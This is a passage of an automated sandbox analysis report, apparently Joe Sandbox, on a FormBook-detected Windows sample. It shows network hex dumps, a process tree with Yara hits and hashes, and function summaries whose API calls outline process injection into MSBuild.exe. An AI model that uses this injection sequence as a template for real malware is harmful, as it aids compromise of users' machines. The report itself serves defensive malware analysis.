ed b0 51 3c a8 8a f8 ba c0 bb 28 58 39 c3 4a 1e e5 55 37 97 aa f9 9b 3b 46 66 7f c1 6d 7d 8f 70 eb bf 80 95 4e c1 89 2b a1 f9 7e 9c cb 86 9b d5 93 f6 b2 31 3f e3 30 cb a3 45 b5 ad de fd 79 1e 0c cd 9f 5e 46 Data Ascii: ''%!":S&)-`<\|nrlmsPV,kE>=,hzJulsk7)+tBC=J)\|`Hz[b#0?$eqGbAv(`~R>Svm.11W1Q<(X9JU7;Ffm}pN+~1?0Ey^F
2024-07-27 09:39:04 UTC	1369	IN	Data Raw: 4c 28 4e 72 e5 af c5 46 48 54 9b a4 b4 07 7d 0e 62 13 a3 13 fd 35 d0 cc 65 c2 53 e3 0e 39 3b 95 12 f7 50 f2 34 30 85 11 6a 61 65 df e8 d1 c2 85 84 0f 41 0b 66 d4 4c bd 2b 9d 66 23 92 8d 24 a7 bc 19 cd 55 45 af 72 4a 40 f2 92 14 44 4c af d4 12 e0 33 6a a1 0f 09 20 c0 ab 8d 38 16 cd f1 e5 63 4c b4 66 32 3f a2 2d be ca 30 2f 34 39 76 40 0e 5e aa 5b 24 17 3d ca 10 3e 00 7b b1 5f 85 63 a3 54 75 72 6d de de ab 87 d0 1d a4 51 11 59 c8 d4 fc 70 00 76 d0 27 a2 03 27 a6 1e 8c c0 2d 01 22 aa 82 9a f0 7c ed 31 05 0b ea 7c 70 3e ee a4 2a b4 b7 f1 9c cf a4 78 dc fb 76 68 17 61 32 50 46 fe e7 ac 3b 0a a6 08 1d c2 23 b9 83 68 fd 69 45 d1 6c 6b d9 87 71 51 15 d0 bd fa bd 4d ab fc 33 b8 a3 25 df 66 9d 82 b2 54 39 c4 0b f9 55 6e 38 51 e1 9d 99 d1 c3 5f df 0c 9b 0b 17 47 12 Data Ascii: L(NrFHT}b5eS9;P40jaeAfL+f#$UErJ@DL3j 8cLf2?-0/49v@^[$=>{_cTurmQYpv''-"\|1\|p>*xvha2PF;#hiElkqQM3%fT9Un8Q_G
2024-07-27 09:39:04 UTC	1369	IN	Data Raw: 57 cc 2e 12 cb db ce e6 1c 7a d0 70 2c 69 b4 a0 49 f3 20 06 a5 4e 88 db d4 86 08 10 7e 25 40 0c fd 79 9c c3 fc f4 a1 f5 43 cd 17 72 bf 4b ca f3 37 b7 33 7d 2a fa 53 82 83 49 b0 ea 66 a5 9b 60 24 f8 b9 3a 4e 62 d6 c2 08 61 04 38 15 33 75 c5 2c 75 d1 fc 52 8c 95 4a 8e ca a3 6d 99 37 72 01 f1 b0 18 00 ab cb 5d 33 b5 dd e4 c1 d6 8b 23 a8 dd 35 de 93 58 4a 71 90 27 d5 70 2a a9 69 89 00 8a 1a 3b ff f4 1a 8a 2b f4 22 70 3a 8e 66 33 5f 6b 9d 48 c5 91 2b 12 9f 13 ee 05 b1 ae cf 2e 55 37 c5 6a 8c 7a 2c 46 a1 3d 0d 98 2d 0d 07 23 23 05 ed 28 d3 6e 67 b9 ed ed 29 e2 71 26 81 33 fb 20 59 9b a9 92 b1 72 0d e4 6c a9 9e e0 85 4c 61 d7 8a 76 be c9 db 4f 25 47 96 53 e1 29 52 d6 5e 3a 4f c9 a0 c8 2a c1 41 7b a4 a2 d7 23 55 de 3d 75 c5 43 f0 6f 26 1d 41 de cd 71 1b 9a 81 0b Data Ascii: W.zp,iI N~%@yCrK73}SIf`$:Nba83u,uRJm7r]3#5XJq'pi;+"p:f3_kH+.U7jz,F=-##(ng)q&3 YrlLavO%GS)R^:O*A{#U=uCo&Aq

Target ID:	0
Start time:	05:39:00
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\9B1ZyhsFUq.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\9B1ZyhsFUq.exe"
Imagebase:	0xd50000
File size:	65'536 bytes
MD5 hash:	0C7B233A4BF0FC22C9E2A49818BC90A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:39:04
Start date:	27/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x620000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1719734977.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1719734977.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1719850737.0000000001460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1719850737.0000000001460000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:39:39
Start date:	27/07/2024
Path:	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe"
Imagebase:	0xa40000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	05:39:40
Start date:	27/07/2024
Path:	C:\Windows\SysWOW64\convert.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\convert.exe"
Imagebase:	0x890000
File size:	19'456 bytes
MD5 hash:	2B1AC34AB72C95793CFE7E936F15389D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2510828363.0000000003490000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2510828363.0000000003490000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2511150880.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2511150880.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	05:39:53
Start date:	27/07/2024
Path:	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe"
Imagebase:	0xa40000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2514005145.0000000004B10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2514005145.0000000004B10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	05:40:05
Start date:	27/07/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff613480000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	19.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	21
Total number of Limit Nodes:	1

Executed Functions

Function 00007FF7C19335BD Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298976552.00007FF7C1930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1930000_9B1ZyhsFUq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf976ff272a35a056cba808b9e9d0c23d18f49cabcb7ba39e47db1308132a71d
Instruction ID: e75c10f6425e7137649eb0d8ee6de0b921bd877436b8639b7f6502582656878e
Opcode Fuzzy Hash: bf976ff272a35a056cba808b9e9d0c23d18f49cabcb7ba39e47db1308132a71d
Instruction Fuzzy Hash: A4517971909A5DCFDB48EF68D8916ECB7B1FF49315F90023AD40AE3291CB79A941CB90

Function 00007FF7C1938CB0 Relevance: 2.4, APIs: 1, Instructions: 880
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE ref: 00007FF7C1939483

Memory Dump Source

Source File: 00000000.00000002.1298976552.00007FF7C1930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1930000_9B1ZyhsFUq.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6bd5ae7794c899b53ffc634cee472207abd502f86b5401af4f07b219194e2635
Instruction ID: 64ff8c354929f90c488ed89585d0884b06f700cfafa61c911f846a4180805286
Opcode Fuzzy Hash: 6bd5ae7794c899b53ffc634cee472207abd502f86b5401af4f07b219194e2635
Instruction Fuzzy Hash: E4E15C70918A8D8FDBA8EF18CC59BE977E0FB59311F40412AD84ED7291DB749680CB41

Function 00007FF7C1939B41 Relevance: 1.7, APIs: 1, Instructions: 222
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE ref: 00007FF7C1939CC0

Memory Dump Source

Source File: 00000000.00000002.1298976552.00007FF7C1930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1930000_9B1ZyhsFUq.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: eda41395a3f16a0355d9069568cfc41d16e233e4072b2f20250c6efd2a5d17e7
Instruction ID: a5817004c08a851fcb6949e85b9115546c55479124f7ee24321092af684a4ffb
Opcode Fuzzy Hash: eda41395a3f16a0355d9069568cfc41d16e233e4072b2f20250c6efd2a5d17e7
Instruction Fuzzy Hash: E7612770908A5D8FDB98DF58C885BE9BBF1FB69311F5082AAD04DE3251CB74A985CF40

Function 00007FF7C1939975 Relevance: 1.7, APIs: 1, Instructions: 199
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE ref: 00007FF7C1939AB5

Memory Dump Source

Source File: 00000000.00000002.1298976552.00007FF7C1930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1930000_9B1ZyhsFUq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0e733129087aecd3fe6c173a820e00fce43688f323f82e0fc0d74b2c5142600e
Instruction ID: 8e2417af0b423f63f6fa6d1c51b45406b0f88e2967df54c7cedb90a3a784d457
Opcode Fuzzy Hash: 0e733129087aecd3fe6c173a820e00fce43688f323f82e0fc0d74b2c5142600e
Instruction Fuzzy Hash: 68513970908A5D8FDF94EF58C885BE9BBF1FB69310F1081AAD04DE3252DB71A985CB41

Function 00007FF7C1939D4D Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE ref: 00007FF7C1939E8B

Memory Dump Source

Source File: 00000000.00000002.1298976552.00007FF7C1930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1930000_9B1ZyhsFUq.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: c529bfc2554c58b3d0a102d22185dc994187f491590118f49ef8637fec06ad5c
Instruction ID: 2ca2ffe2658fc8be532694d94a0ef91880e655d94a429851876d3ee3b18ee29f
Opcode Fuzzy Hash: c529bfc2554c58b3d0a102d22185dc994187f491590118f49ef8637fec06ad5c
Instruction Fuzzy Hash: 2D512570908A5C8FDB94DF58C885BE9BBF1FB69310F5082AAD44DE3252DB74A985CF40

Function 00007FF7C193967E Relevance: 1.7, APIs: 1, Instructions: 192
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNELBASE ref: 00007FF7C19397C5

Memory Dump Source

Source File: 00000000.00000002.1298976552.00007FF7C1930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1930000_9B1ZyhsFUq.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 822e3ed4cd6c672f1ef5aee87351599c4628f8c383c56956c1e35da31876003a
Instruction ID: 9510d0eff627c706aa148b0ed5d8d352e1daad37757f9e692fe56a0f88418794
Opcode Fuzzy Hash: 822e3ed4cd6c672f1ef5aee87351599c4628f8c383c56956c1e35da31876003a
Instruction Fuzzy Hash: 81518970C0864D8FEB55DFA8C845BEDBBF1FB6A311F1082AAD049E7252CB74A485CB50

Function 00007FF7C1939839 Relevance: 1.6, APIs: 1, Instructions: 142
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 00007FF7C193990F

Memory Dump Source

Source File: 00000000.00000002.1298976552.00007FF7C1930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1930000_9B1ZyhsFUq.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 58f16f3647f1ac305b508c5970930b6633660543f099f286955810fb8441b5df
Instruction ID: af462695e8d30995ff92298baa99ad116a5c357089ef68d7c17d9a068c864f4c
Opcode Fuzzy Hash: 58f16f3647f1ac305b508c5970930b6633660543f099f286955810fb8441b5df
Instruction Fuzzy Hash: D3412A70D0864D8FDB59DFA8D885BEDBBF0FF56320F1041AAD049E7252DA74A885CB41

Non-executed Functions

Function 00007FF7C1930E88 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1298976552.00007FF7C1930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c1930000_9B1ZyhsFUq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 114a6a1c667288e7772b2f23ab5fc2419c97f5712db81d87abc41b1b73cec8da
Instruction ID: 478f899ec15cbd69d7ef65584a6cdd627cb4f30ac8b5e79659d5939bc6fb8d7a
Opcode Fuzzy Hash: 114a6a1c667288e7772b2f23ab5fc2419c97f5712db81d87abc41b1b73cec8da
Instruction Fuzzy Hash: CC6142B7A1496A4BDB40BF6CAC457EAF7A0EF45376B840677D15CCB243CE2478828780

Analysis Process: MSBuild.exePID: 8172, Parent PID: 7656COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	5%
Signature Coverage:	9.3%
Total number of Nodes:	140
Total number of Limit Nodes:	8

Executed Functions

Function 004176E3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417755

Memory Dump Source

Source File: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 6945c84d21f093eaaaa8d35cfda629143065d96eb732340c6fb4e64a5480fff7
Instruction ID: 95ab407d6857abfcbffc4fbb3e2a41d24b2182dc98f24cfff272290cf341f69d
Opcode Fuzzy Hash: 6945c84d21f093eaaaa8d35cfda629143065d96eb732340c6fb4e64a5480fff7
Instruction Fuzzy Hash: DB0112B5E0020DB7DF10DBE5DC42FDEB778AB54304F0041A6E91897280F675EB548B95

Function 0042B253 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?), ref: 0042B287

Memory Dump Source

Source File: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 71f2d4d9845514d85ca477c2236196dd34edef0c8c1c32d0e7ef2a9b942529fc
Instruction ID: 1361a1e7142ddfd489243f1b5e91cde4d4ad9004687e89ca47c5beb845828a35
Opcode Fuzzy Hash: 71f2d4d9845514d85ca477c2236196dd34edef0c8c1c32d0e7ef2a9b942529fc
Instruction Fuzzy Hash: B3E04F766442147BD520EA5ADC41FDBB75CDFC5714F00441AFA1C67142C67479008BB4

Function 010C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010C35CA

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8bdaeff705f71d445b30d24f5dc28fc67201ec1f60ec565e044bad67abba9367
Instruction ID: 510a34855ed59ad2da894fcede28a886b3038c54b0ce0beeaaf4a74f38f17945
Opcode Fuzzy Hash: 8bdaeff705f71d445b30d24f5dc28fc67201ec1f60ec565e044bad67abba9367
Instruction Fuzzy Hash: 7290023560561402E100715C8514706101597D0201F65C412E0824568DC7958A5166A3

Function 010C2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 010C2B6A

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0407db5619d5312c5c233b2b704afbf0f8b64eac96f3f593c18a020a58bb2571
Instruction ID: 9f5ff3559bc62bf12fa0474e16ba2f0976d70ae8b59dd015d69280f4fee66b9d
Opcode Fuzzy Hash: 0407db5619d5312c5c233b2b704afbf0f8b64eac96f3f593c18a020a58bb2571
Instruction Fuzzy Hash: 58900265202510035105715C8414616401A97E0201B55C022E1414590DC52589916226

Function 010C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 010C2DFA

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e288622a6aea29f3d608eaf8b4d3dcd39e93b8458da5c2b529bc854cb0998c1
Instruction ID: acf2c8d1e2d96960b681eea5ca5cacdb14cebf6deb33b413c6205ea3aba0a92b
Opcode Fuzzy Hash: 8e288622a6aea29f3d608eaf8b4d3dcd39e93b8458da5c2b529bc854cb0998c1
Instruction Fuzzy Hash: CD90023520151413E111715C8504707001997D0241F95C413E0824558DD6568A52A222

Function 010C2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 010C2C7A

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 600358b4cd4593ba77800afe7d80ea72b7a045e83e3237ebfaa426247414913b
Instruction ID: 740b2f1bc921d13924461fa47c7379b5b344ed7290895cd18083d1d339512281
Opcode Fuzzy Hash: 600358b4cd4593ba77800afe7d80ea72b7a045e83e3237ebfaa426247414913b
Instruction Fuzzy Hash: FB90023520159802E110715CC40474A001597D0301F59C412E4824658DC69589917222

Function 00413D63 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(-16743,00000111,00000000,00000000), ref: 00413DDA

Strings

-16743, xrefs: 00413DCF, 00413DD9, 00413DEA
-16743, xrefs: 00413DE1, 00413DE4

Memory Dump Source

Source File: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: -16743$-16743
API String ID: 1836367815-2866452196
Opcode ID: 86ff232e2bb5d2e3d57dd2b2351edc2381a03912ef4e0ca3ed1d4a76ea634cf0
Instruction ID: 6fe804f4b9c0c0219d6954f8c7891618d74ceb1abb42e939fa5b634f93a63c19
Opcode Fuzzy Hash: 86ff232e2bb5d2e3d57dd2b2351edc2381a03912ef4e0ca3ed1d4a76ea634cf0
Instruction Fuzzy Hash: DF01C4B1E0011C7ADB10AAA69C81DEFBB7CDF40698F418069FA14A7241D6784F068BA5

Function 00417763 Relevance: 1.5, APIs: 1, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417755

Memory Dump Source

Source File: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 175c931debf1580fbe879dd5c021775c5345b6264a76dbfba9cb6e95e761e372
Instruction ID: a11af4d642e3e69e6637bed7123d37daf0f5c7b2bbaa3f3c430dd56460a441d4
Opcode Fuzzy Hash: 175c931debf1580fbe879dd5c021775c5345b6264a76dbfba9cb6e95e761e372
Instruction Fuzzy Hash: F0F04C7094810AAEDF11FB54DC45FEABB78EB62344F0081A2E428CB241F775F9058BE5

Function 0042B573 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041DED8,?,?,00000000,?,0041DED8,?,?,?), ref: 0042B5AF

Memory Dump Source

Source File: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ba9a21ff84f177d89c2414595160b1a516c624c40ee2b18da29ba7c6b0e6e00d
Instruction ID: 73af168ecdab868dbc7df2e0db76e4513b0e788070129132f103c91a29773bbf
Opcode Fuzzy Hash: ba9a21ff84f177d89c2414595160b1a516c624c40ee2b18da29ba7c6b0e6e00d
Instruction Fuzzy Hash: 59E06D726482057BD650EE59EC45FEB73ACDFC4710F004419FA18A7281D674B9108BB8

Function 0042B5C3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,D70B08E2,00000007,00000000,00000004,00000000,00416FC1,000000F4,?,?,?,?,?), ref: 0042B602

Memory Dump Source

Source File: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e38f2aa0dad7a37cc574240ecb6ebf3c317ee95d0a10442d266198a4d327c2ea
Instruction ID: e5091b1ad8c9f34d0fa006819ad5a74f865557b71feac6cacbcf360d1c278bdd
Opcode Fuzzy Hash: e38f2aa0dad7a37cc574240ecb6ebf3c317ee95d0a10442d266198a4d327c2ea
Instruction Fuzzy Hash: 16E06D726082047BD610EE59EC41F9B73ACEFC5710F004419FD19A7242D670B9118BB9

Function 0042B613 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,?,?,EC92CE2E,?,?,EC92CE2E), ref: 0042B644

Memory Dump Source

Source File: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: bb296b680616577d8a523c8e8c49e2be51f90b814b646c5bfc861b7f506915d8
Instruction ID: f5b29527c7c32054af6b888454ab4d442627c5e24b76eaec9189fd74244b0bd1
Opcode Fuzzy Hash: bb296b680616577d8a523c8e8c49e2be51f90b814b646c5bfc861b7f506915d8
Instruction Fuzzy Hash: CFE086322042147BD520EA5AEC41F9B775CDFC5714F00441AFA4877242C770B90087F4

Function 010C2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 010C2C24

Memory Dump Source

Source File: 00000008.00000002.1719122924.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1050000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 80ae76f0435d3946796b2fa286f217d9b0c9ca3112f64b5d358d6c665a3ad3f8
Instruction ID: ae3ab1fd66be5613d839faeca7cf93f8b18163841a34fc5aa7a8d6639754f940
Opcode Fuzzy Hash: 80ae76f0435d3946796b2fa286f217d9b0c9ca3112f64b5d358d6c665a3ad3f8
Instruction Fuzzy Hash: 39B09B719015D5C5EA51E764860871F795077D0701F15C066D2430681F4738C1D1E676

Non-executed Functions

Function 01102349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

TracingFlags, xrefs: 01102549
DisableHeapLookaside, xrefs: 0110246D
MaxLoaderThreads, xrefs: 011024EC
DisableExceptionChainValidation, xrefs: 0110275F
@, xrefs: 01102B74
CFGOptions, xrefs: 01102967
GlobalFlag2, xrefs: 01102FC0
@, xrefs: 01102942
